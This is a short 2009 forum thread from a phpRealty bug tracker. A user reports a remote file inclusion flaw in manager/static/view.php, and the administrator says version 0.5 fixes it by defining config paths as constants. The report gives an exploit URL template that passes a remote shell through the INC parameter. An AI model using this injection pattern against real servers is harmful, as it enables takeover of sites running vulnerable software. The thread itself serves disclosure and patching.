phpRealty - Blog > phpRealty Usage > Bug Tracker > injection hack
Pages: [1]
« previous next »
  Print  
Author Topic: injection hack  (Read 1195 times)
glio
testers
Newbie
*****
Offline Offline

Posts: 14


View Profile
« on: April 09, 2009, 05:04:54 PM »
http://www.bitscn.com/network/security/200810/152362.html

file:
manager/static/view.php

you can test it:
http://[host]/[phprealty-path]/manager/static/view.php?propID=0&INC=[SHELL]?

 ???how can fix it?

is that fixed in v0.05?
« Last Edit: April 09, 2009, 05:09:48 PM by glio » Logged
johncarlson21
Administrator
Full Member
*****
Offline Offline

Posts: 182


johncarlson21@hotmail.com johncarlson1999
View Profile Email
« Reply #1 on: April 10, 2009, 06:55:42 AM »
hhhmmm sorry to hear this. but yes it is fixed in version 0.5! Smiley
all config variables are now constant vars.
ex: define('INC','some_path_on_your_server');

John
Logged
Pages: [1]
  Print  
« previous next »
 
Jump to: